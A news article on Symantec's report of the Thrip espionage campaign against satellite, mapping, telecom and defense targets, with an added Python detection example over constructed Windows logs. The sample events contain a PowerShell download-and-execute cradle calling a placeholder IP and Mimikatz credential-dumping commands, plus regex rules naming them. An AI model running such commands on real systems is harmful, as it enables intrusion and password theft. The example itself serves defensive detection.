A “wide-ranging” cyber-espionage campaign has been launched by a China-based group known as Thrip, according to a Threat Intelligence report released by cybersecurity giant Symantec.
The attacks were first detected early this year, but a Symantec spokesperson told Fox News that they have confirmed activity through May.
Symantec identified three computers in China used to launch the attacks. “Thrip’s motive is likely espionage and its targets include those in the communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia,” according to the report.
Symantec declined to identify the companies.
Satellite communications operator targeted
One of the most disturbing attacks was directed at a satellite communications operator, Symantec said.
“The attack group seemed to be particularly interested in the operational side of the company, looking for and infecting computers running software that monitors and controls satellites,” Symantec said. “This suggests to us that Thrip’s motives go beyond spying and may also include disruption.”
Another target was an organization involved in geospatial imaging and mapping. In this case, Thrip targeted computers running MapXtreme GIS (Geographic Information System) as well as machines running Google Earth Server and Garmin imaging software.
Other targets included three different telecoms operators, all based in Southeast Asia.
“In all cases…it appeared that the telecoms companies themselves and not their customers were the targets of these attacks,” Symantec added.
There was also a defense contractor that was targeted. When asked by Fox News, Symantec would not elaborate on the nature of the threat or the defense contractor’s identity.
Going on since 2013
In 2013, Symantec initially discovered the China-based Thrip spying campaign. Since then, the group has changed tactics, Symantec said. Thrip has switched from using custom malware to a mixture of custom malware and so-called “living off the land” tools – the latter is what Symantec describes as the use of legitimate operating system features and network administration tools to compromise victims’ networks. This helps to mask a bad actor’s activity.
Some of those tools include PsExec, a Microsoft tool. The attackers were using the Microsoft software to attempt to remotely install malware. “When we analyzed the malware, we discovered that it was an updated version of Trojan.Rikamanu, malware associated with Thrip,” Symantec said.
Another legitimate program is PowerShell, a Microsoft scripting tool “that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance,” according to Symantec.
Other “freely-available” tools are also employed like Mimikatz, which is often used maliciously to change privileges, export security certificates, and recover Windows passwords.
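Because each of these tools is legitimate on its own, defenders usually look for the combination of them on one host rather than any single one. The following added example (not from Symantec’s report or TAA) runs three simple rules over constructed Windows log records: a remote PsExec service install (event 7045), a PowerShell command that downloads from the network (event 4688), and Mimikatz module names in a process command line; it then flags hosts where more than one rule fires. Host names, IP address and log fields are all constructed.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the report): simplified Windows System
# (7045, service installed) and Security (4688, process created) records.
SAMPLE_EVENTS = [
    {"host": "sat-ops-01", "event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "sat-ops-01", "event_id": 4688, "process": "powershell.exe",
     "command_line": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.5/p'))"},
    # Renamed binary: matching on the module name still catches it.
    {"host": "sat-ops-01", "event_id": 4688, "process": "svc_update.exe",
     "command_line": "svc_update.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "hr-ws-07", "event_id": 7045, "service_name": "wuauserv",
     "image_path": r"%SystemRoot%\system32\svchost.exe -k netsvcs"},
    {"host": "hr-ws-07", "event_id": 4688, "process": "powershell.exe",
     "command_line": "powershell Get-Process | Sort-Object CPU"},
]

# Detection rules: (name, required event id, regex over the text fields).
RULES = [
    ("psexec_remote_service", 7045, re.compile(r"psexesvc", re.I)),
    ("powershell_download_cradle", 4688,
     re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|-enc)", re.I)),
    ("mimikatz_credential_access", 4688,
     re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),
]

def _text(event):
    """Concatenate the free-text fields that the rules inspect."""
    return " ".join(str(event.get(k, ""))
                    for k in ("service_name", "image_path", "process", "command_line"))

def detect(events):
    """Return (rule_name, host) for every event that matches a rule."""
    hits = []
    for ev in events:
        text = _text(ev)
        for name, eid, pattern in RULES:
            if ev.get("event_id") == eid and pattern.search(text):
                hits.append((name, ev["host"]))
    return hits

def correlate(hits, threshold=2):
    """Hosts where at least `threshold` distinct rules fired. One tool alone
    (an admin using PsExec) is routine; a chain of them on one host is not."""
    per_host = defaultdict(set)
    for name, host in hits:
        per_host[host].add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= threshold)

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print("hosts to triage:", correlate(detect(SAMPLE_EVENTS)))
```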
To detect attacks, Symantec developed a technology called Targeted Attack Analytics, or TAA, which uses artificial intelligence and machine learning to spot attackers employing tools that are ostensibly innocuous.
“It was TAA that led us to the latest cyber espionage campaign we’ve uncovered,” Symantec said.